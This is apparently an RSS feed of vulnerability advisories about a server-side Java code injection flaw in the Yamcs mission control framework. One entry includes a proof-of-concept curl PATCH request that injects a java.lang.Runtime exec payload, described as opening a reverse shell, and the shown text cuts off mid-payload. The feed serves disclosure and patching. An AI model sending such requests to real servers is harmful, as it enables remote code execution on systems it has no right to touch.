<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 00:28:19 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-338307</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-338307</link>
      <description>EUVD-2026-338307</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-338307</guid>
    </item>
    <item>
      <title>fkie_cve-2026-44632</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-44632</link>
      <description>&lt;p&gt;Yamcs is a mission control framework. Prior to 5.12.7, a server-side code injection vulnerability existed in the Yamcs algorithm evaluation engine org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory, which dynamically compiled and evaluated user-controlled algorithm text through the Janino compiler without enforcing a secure sandbox, so an authenticated user with the ChangeMissionDatabase privilege could override an existing algorithm&amp;#39;s text via the mission database REST API and inject Java code (for example using java.lang.Runtime) to achieve remote code execution on the underlying host operating system. This issue is fixed in versions 5.12.7 and 5.13.0, which disable algorithm editing by default.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Yamcs is a mission control framework. Prior to 5.12.7, a server-side code injection vulnerability existed in the Yamcs algorithm evaluation engine org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory, which dynamically compiled and evaluated user-controlled algorithm text through the Janino compiler without enforcing a secure sandbox, so an authenticated user with the ChangeMissionDatabase privilege could override an existing algorithm&amp;#39;s text via the mission database REST API and inject Java code (for example using java.lang.Runtime) to achieve remote code execution on the underlying host operating system. This issue is fixed in versions 5.12.7 and 5.13.0, which disable algorithm editing by default.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-44632</guid>
    </item>
    <item>
      <title>GHSA-524g-x36v-9wm6 — Yamcs Vulnerable to Server-Side Code Injection (RCE) via Janino Expression Engine in `JavaExprAlgorithmExecutionFactory`</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-524g-x36v-9wm6</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: org.yamcs:yamcs-core&lt;/p&gt;
&lt;p&gt;### Summary
A Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (`org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory`). The application dynamically compiles and evaluates user-controlled algorithm text without enforcing a secure sandbox. An authenticated user with the `ChangeMissionDatabase` privilege can exploit this to achieve Remote Code Execution (RCE) on the underlying host operating system via the Janino compiler.&lt;/p&gt;
&lt;p&gt;### Proof of Concept (PoC)
The vulnerability can be exploited by overriding an existing algorithm&amp;#39;s text via the REST API and injecting a malicious Java payload that executes OS commands.&lt;/p&gt;
&lt;p&gt;**Prerequisites:**
1. A running Yamcs instance with an active processor (e.g., `instance=myproject`, `processor=realtime`).
2. An active authentication token for a user with the `SystemPrivilege.ChangeMissionDatabase` privilege.&lt;/p&gt;
&lt;p&gt;**Steps to Reproduce:**&lt;/p&gt;
&lt;p&gt;1. Send an authenticated HTTP `PATCH` request to the MDB override endpoint to inject the malicious Java code into an existing algorithm (e.g., `copySunsensor`). The payload uses `java.lang.Runtime` to execute a reverse shell or ping an external webhook.&lt;/p&gt;
&lt;p&gt;```bash
curl -i -X PATCH \
  &amp;#39;http://&amp;lt;YAMCS-SERVER-IP&amp;gt;:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor&amp;#39; \
  -H &amp;#39;Content-Type: application/json&amp;#39; \
  -H &amp;#39;Authorization: Bearer &amp;lt;YOUR_AUTH_TOKEN&amp;gt;&amp;#39; \
  -d &amp;#39;{
    &amp;#34;action&amp;#34;: &amp;#34;SET&amp;#34;,
    &amp;#34;algorithm&amp;#34;: {
      &amp;#34;text&amp;#34;: &amp;#34;try { java.lang.Runtime.getRuntime().exec(new String[]{…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: org.yamcs:yamcs-core&lt;/p&gt;
&lt;p&gt;### Summary
A Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (`org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory`). The application dynamically compiles and evaluates user-controlled algorithm text without enforcing a secure sandbox. An authenticated user with the `ChangeMissionDatabase` privilege can exploit this to achieve Remote Code Execution (RCE) on the underlying host operating system via the Janino compiler.&lt;/p&gt;
&lt;p&gt;### Proof of Concept (PoC)
The vulnerability can be exploited by overriding an existing algorithm&amp;#39;s text via the REST API and injecting a malicious Java payload that executes OS commands.&lt;/p&gt;
&lt;p&gt;**Prerequisites:**
1. A running Yamcs instance with an active processor (e.g., `instance=myproject`, `processor=realtime`).
2. An active authentication token for a user with the `SystemPrivilege.ChangeMissionDatabase` privilege.&lt;/p&gt;
&lt;p&gt;**Steps to Reproduce:**&lt;/p&gt;
&lt;p&gt;1. Send an authenticated HTTP `PATCH` request to the MDB override endpoint to inject the malicious Java code into an existing algorithm (e.g., `copySunsensor`). The payload uses `java.lang.Runtime` to execute a reverse shell or ping an external webhook.&lt;/p&gt;
&lt;p&gt;```bash
curl -i -X PATCH \
  &amp;#39;http://&amp;lt;YAMCS-SERVER-IP&amp;gt;:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor&amp;#39; \
  -H &amp;#39;Content-Type: application/json&amp;#39; \
  -H &amp;#39;Authorization: Bearer &amp;lt;YOUR_AUTH_TOKEN&amp;gt;&amp;#39; \
  -d &amp;#39;{
    &amp;#34;action&amp;#34;: &amp;#34;SET&amp;#34;,
    &amp;#34;algorithm&amp;#34;: {
      &amp;#34;text&amp;#34;: &amp;#34;try { java.lang.Runtime.getRuntime().exec(new String[]{…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-524g-x36v-9wm6</guid>
    </item>
  </channel>
</rss>
